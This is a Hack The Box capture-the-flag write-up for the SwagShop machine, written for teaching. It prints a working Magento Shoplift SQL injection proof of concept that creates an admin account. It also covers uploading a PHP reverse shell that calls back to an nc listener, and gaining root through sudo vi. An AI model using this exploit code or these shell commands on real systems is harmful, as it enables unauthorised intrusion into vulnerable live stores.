SwagShop HTB

IP

10.10.10.140

initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.140 | cut -d"/" -f1 | tr '\n' ','

we can see we have the following two ports open

22,80

Lets run a more in-depth scan of the target

sudo nmap -sCV -p22,80 10.10.10.140 -oA nmap_results

results

Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-18 01:47 EST
Nmap scan report for 10.10.10.140
Host is up (0.026s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to http://swagshop.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.38 seconds

we can see the following

• SSH is running

• Apache 2.4.29 is in place (web server)

• Domain name swagshop.htb we can add this to our hosts file

HTTP Port 80

Lets get feroxbuster running in the background to identify any interesting web pages

feroxbuster -u http://swagshop.htb/ -t 50 -L 5 -n -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php

Looking at the web server we can see the following

Already we can see the webserver is

• Ubuntu server

• running magento

  • magento 2014 is vulnerable to RCE

• runs on php

• MySQLis present

When we look at the about us we can see a possible username

John Doe

We can see there is an option to create an account

Lets create an account a proxy through Burp and see if there are any interesting requests being made

• We now have an account

• nothing to interesting

Let's see if we can exploit Magento

looking at the `http://swagshop.htb/var/package/Magento_Mobile-1.8.0.0.23.2.xml` which we found with feroxbuster we can confirm the version of Magento

1.8.0.0.23.2

after some quick googling we can see this version is vulnerable to SQLI which we can utilise to create a admin account on the system

we can use the following script

Magento-Shoplift-SQLI/poc.py at master · joren485/Magento-Shoplift-SQLIGitHub

What is the actual scripts doing

This script appears to perform SQLI on a Magento CMS (Content Management System) website. It targets the admin interface of the Magento CMS and attempts to create a new admin user with specified credentials. Here's a step-by-step breakdown:

1. Import Libraries:

   import requests
   import base64
   import sys

2. Retrieve Target URL:

   target = sys.argv[1]

   The script expects the target website URL as a command-line argument.

3. Ensure Target URL Format:

   if not target.startswith("http"):
       target = "http://" + target
   
   if target.endswith("/"):
       target = target[:-1]

   These lines ensure that the target URL starts with "http://" and does not end with a trailing slash.

4. Construct Target URL for Admin Interface:

   target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"

   The target URL is constructed for the Magento admin interface.

5. SQL Injection Payload:

   SQLQUERY = """
   SET @SALT = 'rp';
   SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
   SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
   INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
   INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
   """

   This is the SQL injection payload. It inserts a new admin user into the admin_user table with a specified username and password.

6. Format and Encode Payload:

   query = SQLQUERY.replace("\n", "").format(username="ypwq", password="123")
   pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

   The payload is formatted into a single line, and the username and password are specified. The payload is then encoded using base64.

7. Craft HTTP Request:

   r = requests.post(target_url, 
                     data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                           "filter": base64.b64encode(pfilter),
                           "forwarded": 1})

   An HTTP POST request is sent to the target URL with the encoded payload.

8. Check Response:

   if r.ok:
       print "WORKED"
       print "Check {0}/admin with creds ypwq:123".format(target)
   else:
       print "DID NOT WORK"

   If the request is successful (HTTP status code 200), it prints a success message along with the admin URL and credentials. Otherwise, it prints a failure message.

Okay once we have ran the script we should get a admin user within the Content Management System so

python2 exploit.py 10.10.10.140

Now when we navigate to the `http://swagshop.htb/index.php/admin/` we can use the supplied creds and access the system

Looking through the CMS we can see we have the option to add pages and knowing the site runs off php we could potentially upload a php reverse shell and gain access to the system

We will use PHP monkeys reverse shell

cp /usr/share/webshells/php/php-reverse-shell.php ./

edit the script with our local ip and port

Lets start a nc listner

rlwrap -cAr nc -lvnp 9001

Now lets upload the php file

• hmmm this didnt seem to work when we tried to upload the file as a page, Lets re think this

What we can is add a custom option within one of the files, that allows for uploading php files

to do this we can

within the catalogue -> manage products we can Edit one of the existing products

within the left panel we click on Custom Options

click on Add New Option

then we would specify a file and extention

Click save

Now when we navigate to the chosen product we can see the ability to upload a php file

Once we have uploaded our reverse shell and added the product to cart we should be able to navigate to

http://swagshop.htb/media/custom_options/quote/p/h/swagshop.htb

we can see our shell sitting here once we click it it will call back to our lkistner

Priv esc via www-data

First lets stabilize our shell

python3 -c "import pty;pty.spawn(/'bin/bash)"

Checking our sudo privs

sudo -l

we can run vi as root this is good lets check out

GTFOBinsgtfobins.github.io

so we can run vi as root on any file within the /var/www/html directory

sudo /usr/bin/vi /var/www/html/index.php
# within vi 
:set shell=/bin/sh
:shell

we are now root